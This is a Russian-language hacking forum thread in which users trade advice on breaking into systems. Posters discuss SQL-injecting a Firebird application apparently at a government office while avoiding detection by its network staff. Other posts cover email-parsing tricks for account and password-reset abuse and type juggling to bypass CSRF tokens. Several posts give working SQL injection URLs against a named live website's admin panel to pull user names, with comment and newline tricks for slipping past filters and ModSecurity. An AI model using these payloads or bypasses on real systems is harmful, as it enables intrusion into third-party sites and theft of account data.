Мало инфы. Что за сегменты? Обращение к Сиукул-серверу по защищенному протоколу? Если нет, то можно отправлять запросы прямо так из SQL IDE инжекция не нужна, часто такие приложения делаються для внутренней сети. Что за SQL-сервер, возможно если крутой сервер типа Оракла, там могучие средства для разделения полномочий и прав. Возможно доступна только не приватная инфа
ХЗ Firebird никогда с ней не имел дел. в архитектуре не вижу ВПН и вообще каких то навороченных защит. Походу классическая двухзвенная архитектура. Если не знаешь никаких утилит мониторинга для Firebird, то вариантов два: Собрать снифером дамп и посмотреть там на наличии уязвимых SQL-запросов, но Attention походу контора госслужбы какой то тебя могут спалить, когда снифер работает это очень заметно в сети... если запросы не найдешь то вариант второй: reverse-engineering клиентского приложения. Кароч кратко, технология SQL-инжектинга тем и хороша что не зависит от сопутствующего ПО, твоя схема вполне может быть сплотабельная, даже более чем Вэб-приложения, единственно задача поиска требует более сложных технических решений.
1) VPN вверху в облачке написано. Его роль выполняет АПКШ Континент. Справа сегмент сети на уровне города. Слева региональный уровень. Есть ещё 3й на уровне страны. 2) http://www.ibase.ru/d_tools/ Вот вроде бы утилиты для мониторинга и администрирования? 3) Что значит сплотабельная?
А да, точно не заметил, в таком виде ВПН тебе не помеха. Если ты кончено будешь с рабочего места . Очень хорошо, вот работай. Или ты предлагаешь мне их скачать? Значит подвержена атаке при помощи сплоета.
доброго времени суток господа. Подскажите, есть ли уязвимости на форумах phpBB 3.0.5 и выше??? По гуглю ничего толкового не нашел, в секурити лаб тоже.
Есть саит которыи не разрешает регать больше одного акаунта 1 емаилом но при вводе (пробел)[email protected] почта считается как другая и подтверждение по почте все работает это уже баг какие последующие баги может открыть данный баг?
возможно, что-то в духe " [email protected] [email protected] " " [email protected], [email protected] " а потом востановление пароля... У меня другой вопрос, может cat1vo ответит на него... Есть сайт, сайт мебельный. http://mt.ua/ Надо найти в нем баги, что бы взяли на работу. раскодировав получаем что это такое. с чем его едят?
можно же погуглить, токен от межсайтовой подделки запросов http://repository.root-me.org/Explo... loose comparison - Type Juggling - OWASP.pdf - примерно в середине рассказывает про баг в ларавеле для обхода проверки XSRF, вообще хорошая pdf, про типы данных и проверки
Парни подскажите что можно попробовать в такой ситуации: par1=sleep(20) -> time = 20024 ms par1=eval(sleep(20)) -> time 2000ms и так далее.... Как определить что за интерпретатор принимает параметр? Чей код инжектить?
Добрый подскажите, как раскрутить данную sql (параметр id) Spoiler: посмотреть Авторизация: Code: bringthemes.com/natural-food/home-1/admin/ (demo/demo) Пробую: Code: bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(substring(group_concat(username),1,32))from(oc_user)))))--+uHHl но в ответ постоянная загрузка и отрубает (Error - Connection reset) Подскажите что фильтрует и как обойти? обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((
Зачем идти в Москву через Китай Code: http://bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&id=-1 union /*!12345select*/ 1,2,3,4,user(),version%0A(),7 --+uHHl&token=nGLvYhzmGxV0JoQDKfwjr1xiBwes8qoF Бапассить select можно старыми добрыми комментами А байпассить функции с помощью %0A перед () UPD: И ты используешь error-based хотя здесь самый обычный UNION
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23 Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
Таргет дай нормальный, векторов куча, если hacking attemp - это скорее всего mod security - он байпассится в том числе векторов на один пост выше